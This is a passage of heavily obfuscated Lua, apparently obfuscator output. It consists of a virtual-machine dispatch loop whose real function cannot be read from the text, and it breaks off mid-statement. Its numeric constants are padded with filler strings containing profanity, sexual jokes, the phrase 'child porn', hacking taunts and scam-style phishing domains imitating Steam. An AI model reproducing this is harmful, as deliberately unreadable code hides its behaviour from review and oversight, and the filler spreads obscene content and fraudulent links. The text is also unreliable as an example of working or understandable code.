_l_;__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];if(__[_[_l__]]==__[_[_lll_]])then _l=_l+_l__l;else _l=_[__ll];end;break end;break;end break;end while 3501==(_l_)/(((1706+-0x70)+-#[[How did adam and eve populate?]]))do _l_=(6810845)while((374-0xd6)+-#[[I am albanian obfuscator I cannot hide this script please dont view it]])>=__l_l do _l_-= _l_ _l_=(412976)while(0x119-192)<__l_l do _l_-= _l_ local _l_;__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[___ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_l_ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]][__[_[__l__]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]][_[__lll]]=_[___l_];_l=_l+_ll;_=__l[_l];do return end;break end while(_l_)/((0xc6c0/120))==974 do __[_[___l]][_[__lll]]=_[_ll__];break end;break;end while(_l_)/((0x385a5/71))==2095 do _l_=(9070008)while(0x8d+-50)<__l_l do _l_-= _l_ if(__[_[___l]]==_[_lll_])then _l=_l+_l__l;else _l=_[__ll];end;break end while(_l_)/((457932/0xba))==3684 do local _l___;local _____,__llll;local __l_l;local _l_;__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]_____,__llll=_lllll(__[_l_](_l_l(__,_l_+1,_[___ll])))____l=__llll+_l_-1 _l___=0;for _=_l_,____l do _l___=_l___+_ll;__[_]=_____[_l___];end;_l=_l+_ll;_=__l[_l];_l_=_[___l]_____,__llll=_lllll(__[_l_](_l_l(__,_l_+_ll,____l)))____l=__llll+_l_-_l__l _l___=0;for _=_l_,____l do _l___=_l___+_ll;__[_]=_____[_l___];end;_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,____l))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_]()_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[___l];__l_l=__[_[__ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[_llll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[_llll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_lll];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[_llll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_l_ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[____]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]={};_l=_l+_ll;_=__l[_l];for _=_[_lll],_[___ll]do __[_]=nil;end;_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[__l__]];break end;break;end break;end break;end break;end break;end while(_l_)/((3363-0x69d))==3351 do _l_=(3420620)while __l_l<=(0xbf+-84)do _l_-= _l_ _l_=(1113574)while((0x7aa0/218)+-#'What is an upvalue?!? Answer the question!?*1')>=__l_l do _l_-= _l_ _l_=(2598792)while((0xabd3-22042)/231)>=__l_l do _l_-= _l_ _l_=(4967900)while __l_l<=(1581/0x11)do _l_-= _l_ local _l_;__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if __[_[___]]then _l=_l+_ll;else _l=_[__lll];end;break;end while 2350==(_l_)/(((-23+0x860)+-#"soonmec"))do _l_=(446407)while __l_l>(-#"moon 3.1"+(0xab+-69))do _l_-= _l_ local _=_[___l]__[_]=__[_](_l_l(__,_+_ll,____l))break end while(_l_)/(((379750/0xf5)+-#"Oh so you know C++? What does sizeof(int) equal to? (gcc)"))==299 do __[_[_l__]]();break end;break;end break;end while 2604==(_l_)/((240518/0xf1))do _l_=(180880)while __l_l<=((0x1842/45)+-#'oh oh i will hack you =opens dev console=')do _l_-= _l_ _l_=(715644)while __l_l>(-#'guys listen... sussex XD'+(((-0x3c+399)+-#'dOeS iT sUppOrT gEtFeNv tHo?')-0xbf))do _l_-= _l_ local ___;local _l_;__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]][__[_[_lll_]]];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];___=__[_[_lll_]];if not ___ then _l=_l+_l__l;else __[_[_ll_]]=___;_l=_[_llll];end;break end while 193==(_l_)/((-#[[moon 3.1]]+(3814+-0x62)))do local _ll=_[_l__];local __l=__[_ll]local _l_=__[_ll+2];if(_l_>0)then if(__l>__[_ll+1])then _l=_[_llll];else __[_ll+3]=__l;end elseif(__l<__[_ll+1])then _l=_[_l_ll];else __[_ll+3]=__l;end break end;break;end while 560==(_l_)/(((0x2e0-377)+-#"did you solve the lua challenge yet?"))do _l_=(392524)while(151+-0x35)<__l_l do _l_-= _l_ local _lll;local _l_;_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];_lll=__[_[_l_ll]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[__l__]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=(_[_l_ll]~=0);break end while 242==(_l_)/((0x3f5c0/160))do local _llll;local ___;local _ll_;local _l_;__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];_ll_=__[_[___ll]];__[_l_+1]=_ll_;__[_l_]=_ll_[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];_ll_=__[_[____]];__[_l_+1]=_ll_;__[_l_]=_ll_[_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];___={__,_};___[_l__l][___[_l___][_ll_l]]=___[_ll][___[_l___][_lll_]]+___[_l__l][___[_l___][____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]]%_[__ll_];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];_ll_=_[___ll];_llll=__[_ll_]for _=_ll_+1,_[__l__]do _llll=_llll..__[_];end;__[_[___l]]=_llll;_l=_l+_ll;_=__l[_l];___={__,_};___[_l__l][___[_l___][_lll]]=___[_ll][___[_l___][_lll_]]+___[_l__l][___[_l___][__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[___ll]]%_[_lll_];break end;break;end break;end break;end while 539==(_l_)/((0x51b64/162))do _l_=(4354364)while((-#"deobfuscation in progress"+(85-0x57))+0x82)>=__l_l do _l_-= _l_ _l_=(4353242)while __l_l<=((0xfe-136)+-#[[i hate noobmaster]])do _l_-= _l_ _l_=(14533860)while((327-0xb0)+-#"someone play kogama with perth please hes so lonely")<__l_l do _l_-= _l_ __[_[_lll]]=(_[____]~=0);break end while 3660==(_l_)/(((4080+-0x66)+-#[[soonmec]]))do local ___;local _l_;__[_[_l__]]=__[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];____l=_l_+_ll_ll-1;for _=_l_,____l do ___=__llll[_-_l_];__[_]=___;end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];do return __[_l_](_l_l(__,_l_+1,____l))end;_l=_l+_ll;_=__l[_l];_l_=_[_lll];do return _l_l(__,_l_,____l)end;_l=_l+_ll;_=__l[_l];do return end;break end;break;end while 2102==(_l_)/((4210-0x85b))do _l_=(350550)while(0x2376/89)<__l_l do _l_-= _l_ local _l_;__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=(_[__lll]~=0);break end while 225==(_l_)/((0xc78-1634))do __[_[_ll_]]=(_[___ll]~=0);break end;break;end break;end while(_l_)/((228452/0xc7))==3793 do _l_=(422220)while(((0x3fc8+-114)/0x86)+-#[[balls in ur jawz]])>=__l_l do _l_-= _l_ _l_=(1656116)while __l_l>(-0x4b+179)do _l_-= _l_ local _l=_[_l__];local _ll=__[_[_llll]];__[_l+1]=_ll;__[_l]=_ll[_[_lll_]];break end while(_l_)/(((-#"Yeah this is getting cringe-"+(-0x38+6369))-0xc64))==532 do local _l_;__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if not __[_[___]]then _l=_l+_l__l;else _l=_[____];end;break end;break;end while(_l_)/((0x22f-332))==1860 do _l_=(3514536)while(-#"luraph better than psu XD"+(357-0xe2))<__l_l do _l_-= _l_ local _={_,__};_[_l___][_[_l__l][___]]=_[_l___][_[_ll][__ll]]+_[_l__l][__ll_];break end while(_l_)/((-#'sexy'+(0xba1-1542)))==2456 do local _ll=_[___];local _l=__[_[__ll]];__[_ll+1]=_l;__[_ll]=_l[__[_[__l__]]];break end;break;end break;end break;end break;end while(_l_)/((0xc0c-1600))==2305 do _l_=(2353176)while __l_l<=(154+-0x27)do _l_-= _l_ _l_=(6167192)while(16761/0x97)>=__l_l do _l_-= _l_ _l_=(376720)while __l_l<=(0x102-149)do _l_-= _l_ _l_=(9645560)while __l_l>(185+-0x4d)do _l_-= _l_ local __ll;local _ll_;local _l_l;local _l_;__[_[_lll]]();_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_____[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];_l_l=__[_[____]];__[_l_+1]=_l_l;__[_l_]=_l_l[_[__l__]];_l=_l+_ll;_=__l[_l];_l_=_[___]_ll_={__[_l_](__[_l_+1])};__ll=0;for _=_l_,_[_lll_]do __ll=__ll+_ll;__[_]=_ll_[__ll];end _l=_l+_ll;_=__l[_l];_l=_[__lll];break end while(_l_)/(((-86+0xbd9)+-#"free nitro real?!"))==3292 do __[_[_lll]][__[_[_l_ll]]]=__[_[_l_l_]];break end;break;end while 1108==(_l_)/((730-0x186))do _l_=(9180647)while((-0x7f+261)+-#"guys listen... sussex XD")<__l_l do _l_-= _l_ __[_[_l__]]=__[_[__lll]][__[_[__ll_]]];break end while(_l_)/((4599-0x916))==4039 do local _=_[_ll_l]__[_]=__[_]()break end;break;end break;end while 2329==(_l_)/((-#'v3 has it'+(0x1526-2757)))do _l_=(1548474)while __l_l<=(210+-0x61)do _l_-= _l_ _l_=(2585085)while(0x460/10)<__l_l do _l_-= _l_ __[_[_l__]]=___lll(_l__ll[_[____]],nil,__l_);break end while 4071==(_l_)/((1328-0x2b5))do local _l=_[___];do return __[_l](_l_l(__,_l+1,_[____]))end;break end;break;end while(_l_)/(((0x4bb40/240)+-#[[How did adam and eve populate?]]))==1227 do _l_=(310811)while __l_l>(0x137-197)do _l_-= _l_ local _l___;local _l_lll,__llll;local __l_l;local _l_;__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[___l]][_[__ll]]=_[__ll_];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[_llll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[___l];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]_l_lll,__llll=_lllll(__[_l_](__[_l_+_l__l]))____l=__llll+_l_-_ll _l___=0;for _=_l_,____l do _l___=_l___+_ll;__[_]=_l_lll[_l___];end;_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_____[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_l_ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]]*__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];if(__[_[_lll]]==_[__ll_])then _l=_l+_l__l;else _l=_[____];end;break end while 799==(_l_)/((0x350-459))do __[_[_ll_]]={};break end;break;end break;end break;end while 644==(_l_)/((0xea9+-99))do _l_=(15963208)while __l_l<=(-#"moons.ec/purchase"+(29104/0xd6))do _l_-= _l_ _l_=(1132508)while __l_l<=((0x19c-263)+-#[[steancommunityru.ru/scamlinkhere]])do _l_-= _l_ _l_=(2727234)while(282-0xa6)<__l_l do _l_-= _l_ local __l=_[___]local _l_={__[__l](_l_l(__,__l+1,____l))};local _l=0;for _=__l,_[_lll_]do _l=_l+_ll;__[_]=_l_[_l];end break end while(_l_)/((3776-0x782))==1471 do local __ll;local _l_;__[_[___l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[___ll]][__[_[__ll_]]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__ll=__[_[_ll__]];if not __ll then _l=_l+_l__l;else __[_[_lll]]=__ll;_l=_[____];end;break end;break;end while 377==(_l_)/((156208/0x34))do _l_=(1581580)while __l_l>((302-0xa8)+-#"balls in ur jawz")do _l_-= _l_ __[_[_l__]]=#__[_[____]];break end while 1540==(_l_)/(((0x8a9-1153)+-#"give access to functions for boosters"))do __[_[_ll_l]]=(_[____]~=0);_l=_l+_l__l;break end;break;end break;end while 4024==(_l_)/((769598/0xc2))do _l_=(2149470)while(277-((-74+0x10f)+-#[[oh oh i will hack you =opens dev console=]]))>=__l_l do _l_-= _l_ _l_=(6241268)while(960/0x8)<__l_l do _l_-= _l_ local __l_l;local __lll;local _l_;__[_[___l]]=_____[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__lll=__[_[____]];__[_l_+1]=__lll;__[_l_]=__lll[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_____[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__lll=_[__ll];__l_l=__[__lll]for _=__lll+1,_[__ll_]do __l_l=__l_l..__[_];end;__[_[_lll]]=__l_l;_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,_[____]))break end while 3418==(_l_)/((0xea5-1923))do __[_[___]]=_____[_[_l_ll]];break end;break;end while 2565==(_l_)/((82962/0x63))do _l_=(1037792)while(0x7818/252)<__l_l do _l_-= _l_ local _l=_[_ll_];local _=_[____];for _=_l,_ do __[_]=__llll[_-_l];end;break end while(_l_)/((-#'guys im from the future v6 will completely hide your script by returning empty file'+(0x28df8/136)))==904 do local _=_[___];do return __[_](_l_l(__,_+1,____l))end;break end;break;end break;end break;end break;end break;end break;end break;end while 3696==(_l_)/((525-0x123))do _l_=(3204792)while __l_l<=((-0x43+262)+-#"child porn")do _l_-= _l_ _l_=(7390824)while((-0x160c/68)+237)>=__l_l do _l_-= _l_ _l_=(69890)while __l_l<=(-#"starmcommunity.ru/scamlink"+(-121+0x11d))do _l_-= _l_ _l_=(7872800)while __l_l<=(-#[[federal is an asshole]]+((0x10bde-34297)/227))do _l_-= _l_ _l_=(2283502)while(-#"cock and ball"+(0x4ebb/145))>=__l_l do _l_-= _l_ _l_=(6173100)while __l_l<=((0x241e/67)+-#'int 21h on top')do _l_-= _l_ local _l=_[___l]local __l,_=_lllll(__[_l](_l_l(__,_l+1,_[_llll])))____l=_+_l-1 local _=0;for _l=_l,____l do _=_+_ll;__[_l]=__l[_];end;break;end while(_l_)/((0x16440/48))==3249 do _l_=(2556320)while((0x138-176)+-#[[Wocky Slush]])<__l_l do _l_-= _l_ local ___=_l__ll[_[__ll]];local _l_;local _ll={};_l_=___l_l({},{__index=function(_l,_)local _=_ll[_];return _[1][_[2]];end,__newindex=function(__,_,_l)local _=_ll[_]_[1][_[2]]=_l;end;});for _l_=1,_[_l_l_]do _l=_l+_l__l;local _=__l[_l];if _[(-97+0x62)]==157 then _ll[_l_-1]={__,_[_llll]};else _ll[_l_-1]={_____,_[_llll]};end;__l_ll[#__l_ll+1]=_ll;end;__[_[_ll_l]]=___lll(___,_l_,__l_);break end while 1040==(_l_)/((0x7037e/((0x228-329)+-#"did you solve the lua challenge yet?")))do local _={_,__};_[_l___][_[_l__l][_l__]]=_[_l___][_[_ll][_l_ll]]+_[_l__l][___l_];break end;break;end break;end while(_l_)/((-#"daddy chill"+(0x9fa-1306)))==1846 do _l_=(9009336)while __l_l<=(363-0xeb)do _l_-= _l_ _l_=(12717936)while((0x1bf-262)+-#[[why do guys only want bitchy bimbos who walk all over them]])<__l_l do _l_-= _l_ local __l_;local _l_l;local _l_;__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=#__[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l];_l_l=__[_l_]__l_=__[_l_+2];if(__l_>0)then if(_l_l>__[_l_+1])then _l=_[_l_ll];else __[_l_+3]=_l_l;end elseif(_l_l<__[_l_+1])then _l=_[___ll];else 